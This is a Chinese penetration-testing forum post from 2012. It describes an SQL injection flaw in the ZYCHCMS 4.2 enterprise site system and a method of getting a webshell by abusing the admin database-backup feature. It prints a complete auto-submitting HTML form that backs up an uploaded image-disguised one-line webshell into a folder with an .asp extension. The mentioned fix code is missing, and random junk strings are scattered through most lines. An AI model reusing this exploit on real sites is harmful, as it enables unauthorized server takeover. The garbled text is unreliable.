中国网络渗透测试联盟

标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell [打印本页]

作者: admin    时间: 2012-9-10 21:09
标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

6 u% C$ H$ a5 d8 F8 D. m( b- N( R' D% c  D

+ d8 J4 i- r1 c) {) x5 J" c- Q3 E# I3 W  w
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)' P; U7 u3 S2 ]7 ~/ i, r3 A4 S
①SQL注射漏洞
4 U* B1 a& [$ a; E* O 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
+ Z: v* n8 R8 W' I- I$ J 漏洞原因:未过滤
9 p, {) h4 ~" N! t! ^5 x" A; I 漏洞代码:
+ E  V' C- O2 \* a1 Q 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
% Z0 Y4 u1 n$ d3 ?# e$ W 修复方法:在文件开头加入代码
( a1 _' A  P  q/ r& b3 `* h  Y* Q 7 j: N2 s( @! y  V9 [0 ]
- X- |& @# z1 N
②后台拿WBSHELL
3 q/ h1 n/ c0 @" e$ d: @ 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
5 H, s6 ?9 X% i3 I1 `  C 这里在网上找了一个,改了下,将就着用。; j' Q$ E2 n1 V4 D7 [  d
以下是代码本地提交代码/ s) j, |4 Z# J8 _
9 w) X  F. k1 H. X

+ q, p5 B# X& ^<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
, d9 |7 `$ x- w( B <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>5 ~+ Z$ y7 c9 u3 ?$ ^
<tr># I0 N1 p, T5 z2 I
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
5 f* D/ c9 f* W </tr>
7 }: H0 H: N* A% ~3 ^# p$ X/ b" I <tr>
$ `: I# T9 R4 [7 R; m5 c0 z; N <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
$ l8 b; |9 V: q2 m2 J7 e$ t: p </span>) U. c; ^/ f5 [
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
- L! v6 @# v2 _1 ?5 J <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >" {+ m1 h# A- h) f! S; c  B
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>$ `' Z5 b8 A5 Z+ t4 N/ u" ?
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d" m* T' z- @' Q& i
<div align=”left”>" o) t+ u4 z: M2 z/ k& @# z
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />6 e2 C1 B4 ]* E1 _0 h+ p. X- j
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>7 t4 z/ ?/ Q. b! N
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
* {. q) Y9 u2 R# H  Z </div></td>
3 X0 t+ z8 {0 p9 C* f  ? </tr>
& T0 [# V/ w/ V# Y <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
% Q! n( F2 g) e. c6 c <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
! a5 v) ]- h8 r7 }3 G9 D <td class=”td”><div align=”left”>. W# O: N2 G, `+ K4 G& _1 E7 E
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
& K' r$ m( Y6 }4 h: x, a" P [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
% e/ q7 `/ _  v; K; v </tr>7 j3 O; f; O1 T+ l2 u
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
% t; |0 Z! k% k7 Y) L& ^ <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>+ T8 v3 `8 r- G9 G4 i9 n5 [
<td class=”td”><div align=”left”>
- a' g# Z! f: e4 }2 m5 n2 p( | <input type=”submit” value=”确定备份” class=”btn”
4 ]$ l$ m$ M8 y  G5 ]& d' m </div></td>' Q# S/ j/ w: w8 S- }& s
</tr>, |* a% C& k1 o: v, f  h
</table></td></tr></form>
% q+ w  E; L; j# S0 N  J </table>
' f  U3 b* T, D9 v </td>/ C% p9 \  Y% |3 V4 u! s! N: U
</tr>
3 w0 S- I5 R) ]: ?1 ]: V </table>& Q/ p' F& g/ c- |0 G' t6 K2 L( q
<script>' w+ v0 @! G. t; R0 D2 E
document.all.add.submit();, p( S: a+ o7 ]
</script>
4 r' ^& Q/ B) t9 v& Q% L) ~3 X3 u - d9 K% R; |4 s( p  X, u' O: z

$ j: ]' R$ H! U' o  m3 F' F7 k6 I/ g- ?" M5 Z# s4 l
# X1 M' E5 b3 w% G" _

& s" h! P) ~. @
- X- \7 H& }" |% f/ y9 e) Y' n3 q2 d3 p
) o6 T+ c  b0 f3 K" B/ f

3 G- j2 M2 ~. t9 }- ]) X
. w/ _8 Z3 h& C" [




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2